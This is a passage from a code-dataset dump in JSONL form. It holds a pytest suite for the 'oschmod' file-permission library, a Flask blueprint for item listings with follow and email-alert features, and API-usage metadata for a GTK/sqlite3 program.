"line_number": 8, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 8, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 10, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 10, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 10, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 17, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 17, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.HeaderBar", "line_number": 22, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 22, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Box", "line_number": 27, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 27, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 32, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 32, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 33, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 33, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 35, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 35, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 36, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 36, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 39, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 39, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 43, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 43, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 47, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 51, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 51, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 55, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 55, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 59, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 59, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 73, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 73, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 79, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 92, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 92, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 101, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 101, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 102, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 102, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 103, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 103, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 104, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 104, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 108, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 108, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 114, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 114, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 115, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 115, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 119, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 119, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 144, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 144, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 145, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 145, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ListBox", "line_number": 146, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 146, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 147, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 147, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 151, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 151, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 156, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 156, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 159, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 159, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 159, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 162, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 162, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 167, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 167, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 168, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 168, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 169, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 169, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 172, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 172, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 173, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 173, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 175, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 175, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 177, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 177, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 181, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 182, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 199, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 199, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 202, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 202, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 202, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 205, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 205, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 210, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 210, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 214, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 214, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 216, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 216, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 220, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 221, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 229, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 229, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 232, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 232, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 232, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 235, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 235, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 240, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 240, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 241, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 241, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 243, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 243, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 245, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 245, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 247, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 247, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 251, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 252, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 261, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 261, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Window.__init__", "line_number": 264, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Window", "line_number": 264, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 264, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Grid", "line_number": 267, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 267, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Entry", "line_number": 272, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 272, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 275, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 275, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.PositionType", "line_number": 277, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 277, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 281, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 282, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 292, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 292, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.main", "line_number": 294, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 294, "usage_type": "name"}]} +{"seq_id": "434106652", "text": "# -*- coding: utf-8 -*-\n# pylint: disable=redefined-outer-name\n\"\"\"test_oschmod module.\"\"\"\nimport glob\nimport os\nimport random\nimport shutil\nimport stat\nimport string\nimport time\n\nimport oschmod\n\n\ndef test_permissions():\n \"\"\"Tests for stuff.\"\"\"\n test_dir = \"tests\"\n path = os.path.join(test_dir, ''.join(\n random.choice(string.ascii_letters) for i in range(10)) + '.txt')\n file_hdl = open(path, 'w+')\n file_hdl.write(path)\n file_hdl.close()\n oschmod.set_mode(path, stat.S_IRUSR | stat.S_IWUSR)\n assert oschmod.get_mode(path) == stat.S_IRUSR | stat.S_IWUSR\n\n path = os.path.join(test_dir, ''.join(\n random.choice(string.ascii_letters) for i in range(10)) + '.txt')\n file_hdl = open(path, 'w+')\n file_hdl.write(path)\n file_hdl.close()\n mode = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | \\\n stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH\n oschmod.set_mode(path, mode)\n assert oschmod.get_mode(path) == mode\n\n path = os.path.join(test_dir, ''.join(\n random.choice(string.ascii_letters) for i in range(10)) + '.txt')\n file_hdl = open(path, 'w+')\n file_hdl.write(path)\n file_hdl.close()\n mode = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | \\\n stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | \\\n stat.S_IXOTH\n oschmod.set_mode(path, mode)\n assert oschmod.get_mode(path) == mode\n\n file_list = glob.glob(os.path.join(test_dir, \"*txt\"))\n for file_path in file_list:\n try:\n os.remove(file_path)\n except FileNotFoundError:\n print(\"Error while deleting file : \", file_path)\n\n\ndef test_set_recursive():\n \"\"\"Check file permissions are recursively set.\"\"\"\n # create dirs\n topdir = 'testdir1'\n testdir = os.path.join(topdir, 'testdir2', 'testdir3')\n os.makedirs(testdir)\n\n # create files\n fileh = open(os.path.join(topdir, 'file1'), \"w+\")\n fileh.write(\"contents\")\n fileh.close()\n\n fileh = open(os.path.join(testdir, 'file2'), \"w+\")\n fileh.write(\"contents\")\n fileh.close()\n\n # set permissions to badness\n triple7 = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP\\\n | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH\\\n | stat.S_IXOTH\n oschmod.set_mode(topdir, triple7)\n oschmod.set_mode(testdir, triple7)\n oschmod.set_mode(os.path.join(topdir, 'file1'), triple7)\n oschmod.set_mode(os.path.join(testdir, 'file2'), triple7)\n time.sleep(1) # modes aren't always ready to go immediately\n\n # set permissions - the test\n file_mode = 0o600\n dir_mode = 0o700\n oschmod.set_mode_recursive(topdir, file_mode, dir_mode)\n time.sleep(1) # modes aren't always ready to go immediately\n\n # check it out\n assert oschmod.get_mode(topdir) == dir_mode\n assert oschmod.get_mode(os.path.join(topdir, 'testdir2')) == dir_mode\n assert oschmod.get_mode(testdir) == dir_mode\n assert oschmod.get_mode(os.path.join(topdir, 'file1')) == file_mode\n assert oschmod.get_mode(os.path.join(testdir, 'file2')) == file_mode\n\n # clean up\n shutil.rmtree(topdir)\n", "sub_path": "tests/test_oschmod.py", "file_name": "test_oschmod.py", "file_ext": "py", "file_size_in_byte": 3122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 19, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 19, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 23, "usage_type": "call"}, {"api_name": "stat.S_IRUSR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "oschmod.get_mode", "line_number": 24, "usage_type": "call"}, {"api_name": "stat.S_IRUSR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 27, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 27, "usage_type": "attribute"}, {"api_name": "stat.S_IRUSR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "stat.S_IXUSR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "stat.S_IRGRP", "line_number": 31, "usage_type": "attribute"}, {"api_name": "stat.S_IWGRP", "line_number": 32, "usage_type": "attribute"}, {"api_name": "stat.S_IROTH", "line_number": 32, "usage_type": "attribute"}, {"api_name": "stat.S_IWOTH", "line_number": 32, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 33, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 37, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 37, "usage_type": "attribute"}, {"api_name": "stat.S_IRUSR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stat.S_IXUSR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stat.S_IRGRP", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stat.S_IWGRP", "line_number": 42, "usage_type": "attribute"}, {"api_name": "stat.S_IXGRP", "line_number": 42, "usage_type": "attribute"}, {"api_name": "stat.S_IROTH", "line_number": 42, "usage_type": "attribute"}, {"api_name": "stat.S_IWOTH", "line_number": 42, "usage_type": "attribute"}, {"api_name": "stat.S_IXOTH", "line_number": 43, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 44, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 45, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "stat.S_IRUSR", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stat.S_IWUSR", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stat.S_IXUSR", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stat.S_IRGRP", "line_number": 72, "usage_type": "attribute"}, {"api_name": "stat.S_IWGRP", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stat.S_IXGRP", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stat.S_IROTH", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stat.S_IWOTH", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stat.S_IXOTH", "line_number": 74, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 75, "usage_type": "call"}, {"api_name": "oschmod.set_mode", "line_number": 76, "usage_type": "call"}, {"api_name": "oschmod.set_mode", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "oschmod.set_mode", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "oschmod.set_mode_recursive", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 85, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 88, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "oschmod.get_mode", "line_number": 90, "usage_type": "call"}, {"api_name": "oschmod.get_mode", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "oschmod.get_mode", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "48637442", "text": "from flask import Blueprint, render_template, redirect, url_for, current_app\nfrom app.models import Item, Listing, db\nfrom app.forms import ItemForm, ListingForm, User\nfrom flask_login import current_user, login_required\nfrom flask_mail import Message\nimport os\n\nlistings = Blueprint('listings', __name__, template_folder=\"templates\")\n\n@listings.route('/items/all', methods=['GET', 'POST'])\ndef allitems():\n form = ItemForm()\n if form.validate_on_submit():\n if current_user.is_authenticated:\n item = Item(name=form.name.data, image=form.image.data)\n db.session.add(item)\n db.session.commit()\n item_list = Item.query.all()\n return render_template(\"listings/items.html\", title=\"Nontrivial - All Items\", keyword=\"\", form=form, items=item_list)\n\n@listings.route('/items/search/', methods=['GET', 'POST'])\ndef search(keyword):\n form = ItemForm()\n if form.validate_on_submit():\n if current_user.is_authenticated:\n item = Item(name=form.name.data, image=form.image.data)\n db.session.add(item)\n db.session.commit()\n item_list = Item.query.filter_by(name=keyword).all()\n return render_template(\"listings/items.html\", title=\"Nontrivial - Search\", keyword=keyword, form=form, items=item_list)\n\ndef send_updates(item):\n from app import mail\n followers = item.followers\n if len(followers) > 0:\n # used to send mail in bulk\n # keeps the mail object connected until all messages are sent\n with mail.connect() as conn:\n for follower in followers: \n message = Message(\"Nontrivial Item Listing Alert\", sender=os.environ.get('FLASKEMAIL'), recipients=[follower.email])\n \n # open a file and attach to message\n with current_app.open_resource(\"templates/mail/new_listing.html\") as fp:\n message.attach(\"new_listing.html\",\"text/html\", fp.read())\n\n message.html = render_template('mail/new_listing.html', user=follower, item=item, link=url_for('listings.view_item', item_id=item.id))\n conn.send(message) # not mail.send(message)\n\n@listings.route('/items/item/', methods=['GET', 'POST'])\ndef view_item(item_id):\n form = ListingForm()\n if form.validate_on_submit():\n if current_user.is_authenticated:\n item = Item.query.filter_by(id=item_id).first()\n listing = Listing(name=form.name.data, description=form.description.data, image=form.image.data, price=form.price.data, owner=current_user, item=item)\n db.session.add(listing)\n db.session.commit()\n send_updates(item)\n item = Item.query.filter_by(id=item_id).first()\n listings = item.item_listings\n return render_template(\"listings/item.html\", title=\"Nontrivial - \"+item.name, item=item, listings=listings, form=form)\n\n@listings.route('/items/listing/remove/', methods=['POST'])\n@login_required\ndef remove_listing(listing_id):\n listing = db.session.query(Listing).filter(Listing.id==listing_id).first()\n item_id = listing.item.id\n db.session.delete(listing)\n db.session.commit()\n return redirect(url_for('listings.view_item', item_id=item_id))\n\n@listings.route('/items/follow/', methods=['POST'])\n@login_required\ndef follow(item_id):\n item = Item.query.filter_by(id=item_id).first()\n current_user.following.append(item)\n db.session.commit()\n return redirect(url_for('listings.view_item', item_id=item_id))\n\n@listings.route('/items/unfollow/', methods=['POST'])\n@login_required\ndef unfollow(item_id):\n item = Item.query.filter_by(id=item_id).first()\n current_user.following.remove(item)\n db.session.commit()\n return redirect(url_for('listings.view_item', item_id=item_id))", "sub_path": "nontrivial/app/core/listings.py", "file_name": "listings.py", "file_ext": "py", "file_size_in_byte": 3827, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Blueprint", "line_number": 8, "usage_type": "call"}, {"api_name": "app.forms.ItemForm", "line_number": 12, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 14, "usage_type": "name"}, {"api_name": "app.models.Item", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models.db.session.add", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 17, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 17, "usage_type": "name"}, {"api_name": "app.models.Item.query.all", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "app.forms.ItemForm", "line_number": 23, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 25, "usage_type": "name"}, {"api_name": "app.models.Item", "line_number": 26, "usage_type": "call"}, {"api_name": "app.models.db.session.add", "line_number": 27, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 27, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 27, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 28, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 28, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 29, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "app.mail.connect", "line_number": 38, "usage_type": "call"}, {"api_name": "app.mail", "line_number": 38, "usage_type": "name"}, {"api_name": "flask_mail.Message", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.current_app.open_resource", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.current_app", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 46, "usage_type": "call"}, {"api_name": "app.forms.ListingForm", "line_number": 51, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 53, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 54, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 54, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 54, "usage_type": "name"}, {"api_name": "app.models.Listing", "line_number": 55, "usage_type": "call"}, {"api_name": "flask_login.current_user", "line_number": 55, "usage_type": "name"}, {"api_name": "app.models.db.session.add", "line_number": 56, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 56, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 56, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 57, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 57, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 57, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 59, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 59, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "app.models.db.session.query", "line_number": 66, "usage_type": "call"}, {"api_name": "app.models.Listing", "line_number": 66, "usage_type": "argument"}, {"api_name": "app.models.db.session", "line_number": 66, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 66, "usage_type": "name"}, {"api_name": "app.models.Listing.id", "line_number": 66, "usage_type": "attribute"}, {"api_name": "app.models.db.session.delete", "line_number": 68, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 68, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 68, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 69, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 69, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 70, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 64, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 75, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 75, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 75, "usage_type": "name"}, {"api_name": "flask_login.current_user.following.append", "line_number": 76, "usage_type": "call"}, {"api_name": "flask_login.current_user.following", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 76, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 77, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 77, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 78, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 73, "usage_type": "name"}, {"api_name": "app.models.Item.query.filter_by", "line_number": 83, "usage_type": "call"}, {"api_name": "app.models.Item.query", "line_number": 83, "usage_type": "attribute"}, {"api_name": "app.models.Item", "line_number": 83, "usage_type": "name"}, {"api_name": "flask_login.current_user.following.remove", "line_number": 84, "usage_type": "call"}, {"api_name": "flask_login.current_user.following", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 84, "usage_type": "name"}, {"api_name": "app.models.db.session.commit", "line_number": 85, "usage_type": "call"}, {"api_name": "app.models.db.session", "line_number": 85, "usage_type": "attribute"}, {"api_name": "app.models.db", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 86, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 81, "usage_type": "name"}]} +{"seq_id": "349454926", "text": "import sys\n#sys.path.append('/Users/md/Downloads/cc_f20')\n\n\n__author__ = 